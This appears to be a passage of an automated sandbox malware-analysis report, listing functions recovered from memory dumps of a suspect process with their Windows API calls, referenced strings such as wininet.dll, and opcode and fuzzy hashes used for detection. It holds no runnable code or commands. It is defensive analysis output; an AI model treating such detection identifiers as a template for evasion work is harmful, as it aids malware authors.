Function 02AA9F82, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02AA4D42,5EB6522D,FFFFFFFF,02AA4A01,?,?,02AA4D42,?,02AA4A01,FFFFFFFF,5EB6522D,02AA4D42,?,00000000), ref: 02AAA025

Memory Dump Source

Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 2a37bc8465bcd3c567c1340e59dc0b24bc815b682bd50367140032fe139996bd
Instruction ID: 720582c800fc9a816b7fe5d88630a9d7d6a9bfbf215a5537a84199f8b1877953
Opcode Fuzzy Hash: 2a37bc8465bcd3c567c1340e59dc0b24bc815b682bd50367140032fe139996bd
Instruction Fuzzy Hash: 0AF01DB2200109ABDB04CF89DC90EEB77ADEF8C314F158649FA1D97241CA34E812CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AA9FE0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02AA4D42,5EB6522D,FFFFFFFF,02AA4A01,?,?,02AA4D42,?,02AA4A01,FFFFFFFF,5EB6522D,02AA4D42,?,00000000), ref: 02AAA025

Memory Dump Source

Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 3f46404cb8a3f3fac9f1612cc1f8afcc01b901b791ded5d9389264a77fd6e908
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: A5F0A4B2210208ABCB14DF89DC90EEB77ADEF8C754F158248BA1D97241DA30E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AAA10C, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02A92D11,00002000,00003000,00000004), ref: 02AAA149

Memory Dump Source

Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: acb9e57b07dffd9642b011429991bfdd4735d10292ef9dddea74c89cfddfd82b
Instruction ID: 1d3c58476c50b12d624d29d9d2be19f908ff987f340a09ab70b2d3d66d308aca
Opcode Fuzzy Hash: acb9e57b07dffd9642b011429991bfdd4735d10292ef9dddea74c89cfddfd82b
Instruction Fuzzy Hash: 09F01CB6211108BBCB14DF88CC90EEB77AEEF88354F118549BA0897241C630E811CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 02AAA110, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02A92D11,00002000,00003000,00000004), ref: 02AAA149

Memory Dump Source

Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 9841f5966827ae66afc9cdd5e5656d9f9e64a576611e3f1ff328d2370823220e
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 53F015B2210208ABCB14DF89CC90EAB77ADEF88750F118248BE0897241C630F811CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 02AAA060, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02AA4D20,?,?,02AA4D20,00000000,FFFFFFFF), ref: 02AAA085

Memory Dump Source

Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 45e0cb9443fcbb1f61f87c0d00f5cafaa4a4f653ee288aa850258cff539e6194
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: CCD01776240214ABD710EB98CC85FA77BADEF48760F154599BA189B242CA30FA008AE0

Uniqueness

Uniqueness Score: -1.00%

Function 049195D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049195DA

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 319c9b648958b737f3bc64401613588f90c1ce854fb19587725b3d4a00124821
Instruction ID: 54cd1d95dd4c801943c873e3d54f17cc6ec79298f235194b8a2ece4e395f1725
Opcode Fuzzy Hash: 319c9b648958b737f3bc64401613588f90c1ce854fb19587725b3d4a00124821
Instruction Fuzzy Hash: 5A9002A1202110036105B1595514616404A97E0255B61C131E5005590DC565D8917165

Uniqueness

Uniqueness Score: -1.00%

Function 04919540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0491954A

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 23adc15fb30936e914c1bea8cfefc3ff6bf503bd1bbf83a31bc84a15fbba7507
Instruction ID: 370aac9bbb112919a2a366b6c165795b27743fb4a43f7efabac4183ecd7be5a3
Opcode Fuzzy Hash: 23adc15fb30936e914c1bea8cfefc3ff6bf503bd1bbf83a31bc84a15fbba7507
Instruction Fuzzy Hash: 8C900265211110032105E5591704507008697D53A5361C131F5006550CD661D8616161

Uniqueness

Uniqueness Score: -1.00%

Function 04919560, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0491956A

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b3d6e862884526edfb6ff2503949e052b535feda3c87416ce1dab24d9145a428
Instruction ID: 6187ef62146565389fc2a17de2289d96954c622bff755c7420b38e46e32d9e87
Opcode Fuzzy Hash: b3d6e862884526edfb6ff2503949e052b535feda3c87416ce1dab24d9145a428
Instruction Fuzzy Hash: 52900265221110022145E559170450B0485A7D63A53A1C125F5407590CC661D8656361

Uniqueness

Uniqueness Score: -1.00%

Function 049196D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049196DA

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c436a7bd7b8ba4d9da2cd26eb765bac5b511521f8403101bed807773477b7b06
Instruction ID: 34f6432bbda46b54daac6089e5c8a961ed5a8416e3a4d9c0c4a9a4ff56e8f8dd
Opcode Fuzzy Hash: c436a7bd7b8ba4d9da2cd26eb765bac5b511521f8403101bed807773477b7b06
Instruction Fuzzy Hash: B390027120111842F100A1595504B46004597E0355F61C126A4115654D8655D8517561

Uniqueness

Uniqueness Score: -1.00%

Function 049196E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049196EA

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e193196759ca8128665787f29f281336622125bfb16f5df4a049574789ce878d
Instruction ID: aa825eb7a7bf137d9ba079a15cf9939f9b7fa009bfaa8d39572767130157b419
Opcode Fuzzy Hash: e193196759ca8128665787f29f281336622125bfb16f5df4a049574789ce878d
Instruction Fuzzy Hash: 7390027120119802F110A159950474A004597D0355F65C521A8415658D86D5D8917161

Uniqueness

Uniqueness Score: -1.00%

Function 04919610, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0491961A

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d12f2dd2ed57887a729cba60509c5565e380fbbd65175af306ba120c43cdca93
Instruction ID: eab46509ef16404c41435c0b5591d94432670bedaf6e283f1c2c86f75d39deda
Opcode Fuzzy Hash: d12f2dd2ed57887a729cba60509c5565e380fbbd65175af306ba120c43cdca93
Instruction Fuzzy Hash: DE90027160511802F150B1595514746004597D0355F61C121A4015654D8795DA5576E1

Uniqueness

Uniqueness Score: -1.00%

Function 04919650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0491965A

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d6cc453308f10fb784c89e045aeaf143daa9b2038ab31994478956fefdec15a4
Instruction ID: 11da3fb90708ad3bcb8fe4ea912ccc0f635bbce96fca167e715a997fff55037a
Opcode Fuzzy Hash: d6cc453308f10fb784c89e045aeaf143daa9b2038ab31994478956fefdec15a4
Instruction Fuzzy Hash: A690027120515842F140B1595504A46005597D0359F61C121A4055694D9665DD55B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04919660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0491966A

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9da2e5bdc5cbe898f749a1714be20f71bd37f42ee15191258eefc2ccbdaaa7fb
Instruction ID: bc33660731e7aef56e34e12472d10c99bd638fefef739242fd409ffb42d18718
Opcode Fuzzy Hash: 9da2e5bdc5cbe898f749a1714be20f71bd37f42ee15191258eefc2ccbdaaa7fb
Instruction Fuzzy Hash: 0990027120111802F180B159550464A004597D1355FA1C125A4016654DCA55DA5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 04919780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0491978A

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 02c405558149de1c41bbd5f19f270987cc20bad3f3977b981c4c65ea8a44cb89
Instruction ID: 2f2af76fc067be9653b7432c3f011a319ef1ad1c9de344cda9f75cf05255405d
Opcode Fuzzy Hash: 02c405558149de1c41bbd5f19f270987cc20bad3f3977b981c4c65ea8a44cb89
Instruction Fuzzy Hash: E190026921311002F180B159650860A004597D1256FA1D525A4006558CC955D8696361

Uniqueness

Uniqueness Score: -1.00%

Function 04919FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04919FEA

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 23e4f7f4d89d8aa380eee40ab99a17d4b4fa58d0097702c903435cce9dbb1491
Instruction ID: 0b24db53345681613f5f04dfd59f3a4a63b83330c773460dd43889826f2fe197
Opcode Fuzzy Hash: 23e4f7f4d89d8aa380eee40ab99a17d4b4fa58d0097702c903435cce9dbb1491
Instruction Fuzzy Hash: D290027131125402F110A1599504706004597D1255F61C521A4815558D86D5D8917162

Uniqueness

Uniqueness Score: -1.00%

Function 04919710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0491971A

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6594b3bef427ac71c147ce6c880d4abc1c77ce6f9d6813f9a3003ae3b33ff33b
Instruction ID: f2b124ba59a936c567706dbdf758235420f27e5c58f748144725b64980d85eef
Opcode Fuzzy Hash: 6594b3bef427ac71c147ce6c880d4abc1c77ce6f9d6813f9a3003ae3b33ff33b
Instruction Fuzzy Hash: 4B90027120111402F100A5996508646004597E0355F61D121A9015555EC6A5D8917171

Uniqueness

Uniqueness Score: -1.00%

Function 04919770, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0491977A

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: de6c54844f30ad239f64fdcd36fbc722cfab9791a1ea8cc0636dca28db0764e4
Instruction ID: ba2fbd597c24beb753069ea7ac88f47300974390dc867bfa755056eac6100bb7
Opcode Fuzzy Hash: de6c54844f30ad239f64fdcd36fbc722cfab9791a1ea8cc0636dca28db0764e4
Instruction Fuzzy Hash: 8B90026120515442F100A5596508A06004597D0259F61D121A5055595DC675D851B171

Uniqueness

Uniqueness Score: -1.00%

Function 04919840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0491984A

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3fb0ddf8ee1a168f13a068258b1e8c0a6a39c2e461a79c423fe4c81f38affb14
Instruction ID: 193f5ef66d1dc39a12ac60f86c2edb76dc2183c04f885653f93a3664589ece02
Opcode Fuzzy Hash: 3fb0ddf8ee1a168f13a068258b1e8c0a6a39c2e461a79c423fe4c81f38affb14
Instruction Fuzzy Hash: 28900261242151527545F15955045074046A7E02957A1C122A5405950C8566E856E661

Uniqueness

Uniqueness Score: -1.00%

Function 04919860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0491986A

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 186e1c449d6e9ca13c4a2be1745eca45b5bfb53d9f2276b0929ff462b5d76d0e
Instruction ID: 7ab4c21d940313286e0d22dab40b519fcb8ecf6826d8f3067e74d00312147911
Opcode Fuzzy Hash: 186e1c449d6e9ca13c4a2be1745eca45b5bfb53d9f2276b0929ff462b5d76d0e
Instruction Fuzzy Hash: ED90027120111413F111A1595604707004997D0295FA1C522A4415558D9696D952B161

Uniqueness

Uniqueness Score: -1.00%

Function 049199A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049199AA

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e4d1b5a2ddb677378d2ccd58fbad7dfd0e74f4baf3893d2f8159029ec3e709c1
Instruction ID: 94de48a6d5184dc7faa1733a16b9083c2e1a3df9d0c47e299c2eb9da985fab90
Opcode Fuzzy Hash: e4d1b5a2ddb677378d2ccd58fbad7dfd0e74f4baf3893d2f8159029ec3e709c1
Instruction Fuzzy Hash: 9B9002A134111442F100A1595514B060045D7E1355F61C125E5055554D8659DC527166

Uniqueness

Uniqueness Score: -1.00%

Function 04919910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0491991A

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ba59d363f20cc9b6478ce4ef952939769189f539ec58c5b6aca0153b7dce070
Instruction ID: 0a0da351b4a25c30461177c11cf810f34294b136f151372b94b4e2fc2d806c18
Opcode Fuzzy Hash: 6ba59d363f20cc9b6478ce4ef952939769189f539ec58c5b6aca0153b7dce070
Instruction Fuzzy Hash: BD9002B120111402F140B1595504746004597D0355F61C121A9055554E8699DDD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 04919A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04919A5A

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f12ab9b06f0e00fd652a2c678182c861c92c6b9b94693e27466b92b4dbf256ce
Instruction ID: 28ccf2d135aa49626db9c0f0dfc4cc34c3d00b20e4ecba29ea0a13ced594ad77
Opcode Fuzzy Hash: f12ab9b06f0e00fd652a2c678182c861c92c6b9b94693e27466b92b4dbf256ce
Instruction Fuzzy Hash: A890026121191042F200A5695D14B07004597D0357F61C225A4145554CC955D8616561

Uniqueness

Uniqueness Score: -1.00%

Function 02A9AD4B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02A9AD42

Strings

l, xrefs: 02A9AD7F
., xrefs: 02A9AD78

Memory Dump Source

Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID: .$l
API String ID: 2234796835-2021555757
Opcode ID: b6d4f195393f6e273edd5795868c29266ae35dcefa257e36494ac1e59cdcfaef
Instruction ID: 2dc47109a4f5686c1238b536303d8986aee62150376cac478160da0f8c0a9c16
Opcode Fuzzy Hash: b6d4f195393f6e273edd5795868c29266ae35dcefa257e36494ac1e59cdcfaef
Instruction Fuzzy Hash: A921B275A00309AFCF20DF69C981BAAB3F5EF59309F10895AD449CB642EF70E545CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02AAA236, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02AA4506,?,02AA4C7F,02AA4C7F,?,02AA4506,?,?,?,?,?,00000000,00000000,?), ref: 02AAA22D
RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02A93AF8), ref: 02AAA26D

Strings

.z`, xrefs: 02AAA25C, 02AAA268

Memory Dump Source

Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFree
String ID: .z`
API String ID: 2488874121-1441809116
Opcode ID: 1b53b0690028fa73c43e51403fd9c2aa618d47d85d6616b618b0dd175e94603e
Instruction ID: a1cf19aaf71b5cd94d17f8fc6e39fea70bddb174e50dfaf74fd270a422ef66e8
Opcode Fuzzy Hash: 1b53b0690028fa73c43e51403fd9c2aa618d47d85d6616b618b0dd175e94603e
Instruction Fuzzy Hash: ABF08CB62112146BCA14EF64EC44EE777ADDF84664F004159FE0C57602CA31E954CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 02AA8C47, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 95sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02AA8CF8

Strings

wininet.dll, xrefs: 02AA8CAE, 02AA8CB7
net.dll, xrefs: 02AA8CC1, 02AA8D1F, 02AA8D2B

Memory Dump Source

Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 65abcb6afb24e9be1d87876e2ec0366dc528a7fa7ac8095b9cc1d8c80108f3c1
Instruction ID: f160254ea99f9662c8868e630615ced0cccac6e99e8a97a92e5b4d095fca7470
Opcode Fuzzy Hash: 65abcb6afb24e9be1d87876e2ec0366dc528a7fa7ac8095b9cc1d8c80108f3c1
Instruction Fuzzy Hash: F331F571944384BFC720DF64C8D4BAAB7B4FF88700F04815DE6195B241DB78A551CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02AA8C50, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02AA8CF8

Strings

wininet.dll, xrefs: 02AA8CAE, 02AA8CB7
net.dll, xrefs: 02AA8CC1, 02AA8D47, 02AA8D1F, 02AA8D2B, 02AA8D53

Memory Dump Source

Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 67a08615bb939e2e6b42972047d94e51a1e5603f16d4be54f0cf92888aa59f68
Instruction ID: 31712bc4ca60771f4757adc6730e9d8d158cc52f4b81d3a57260f267f5eccd74
Opcode Fuzzy Hash: 67a08615bb939e2e6b42972047d94e51a1e5603f16d4be54f0cf92888aa59f68
Instruction Fuzzy Hash: 00317CB6540344BFC724DF68D884FA7B7B9AF48704F00851DA62AAB241DB74A650CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 02AAA240, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02A93AF8), ref: 02AAA26D

Strings

.z`, xrefs: 02AAA25C, 02AAA268

Memory Dump Source

Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: b7bb307afe6d3480a3e59c255f24e81882ce371d0e58205cb2ef06ff13e5a2ee
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 55E04FB12102046BD714DF59CC44EA777ADEF88750F014554FE0857241C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 02AA2730, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,00000000,02A93A1A,00000000), ref: 02AA2747

Strings

@J7<, xrefs: 02AA275B

Memory Dump Source

Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: e5bc78c54fb214d2c43f8704ace430ec63fe384ae00fb0bc030304da33f96934
Instruction ID: f9b58860b06f08bfff38e65440f735474fe1949e7519d24c49b80309623e57a8
Opcode Fuzzy Hash: e5bc78c54fb214d2c43f8704ace430ec63fe384ae00fb0bc030304da33f96934
Instruction Fuzzy Hash: 36313275A00209DFDB00DFD8D8909EFB7B9BF88304B108559E915E7214DB75EE058BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A982E9, Relevance: 3.1, APIs: 2, Instructions: 56threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02A9834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02A9836B

Memory Dump Source

Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: ae04584b0c2b2d3a50135b42de83b6235908dd4fa046eee06296f3f2ef05c37e
Instruction ID: 7f1b502ac3d2c3c18ceaca0122e9d09ce65a146f6689d315ae983cd3aa5b9571
Opcode Fuzzy Hash: ae04584b0c2b2d3a50135b42de83b6235908dd4fa046eee06296f3f2ef05c37e
Instruction Fuzzy Hash: BB01D431A802287AEF20A6959D42FFE776CAF45B50F054155FF04FA1C0EBA4650A8AE1

Uniqueness

Uniqueness Score: -1.00%

Function 02A982F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02A9834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02A9836B

Memory Dump Source

Source File: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 8be4c89fe13cbfc4435c69bdbf7b1f857814e966c507fb59fb95cd728300bc18
Instruction ID: ae4949610b865818c0a24a41208827a9735a07d8c2bbe27a9718c2bfa3e40484
Opcode Fuzzy Hash: 8be4c89fe13cbfc4435c69bdbf7b1f857814e966c507fb59fb95cd728300bc18
Instruction Fuzzy Hash: B101F731A802287BEF20A6959D42FFF77AC6F41B50F040015FF04BA1C1EB9469054AF5

Uniqueness

Uniqueness Score: -1.00%

Function 02A9ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02A9AD42

Memory Dump Source

